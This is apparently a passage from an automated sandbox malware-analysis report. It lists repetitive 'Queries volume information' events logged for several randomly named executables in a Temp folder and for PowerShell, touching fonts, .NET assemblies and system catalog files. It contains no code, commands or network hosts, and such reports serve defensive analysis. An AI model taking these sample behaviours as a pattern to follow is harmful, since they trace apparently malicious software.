                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
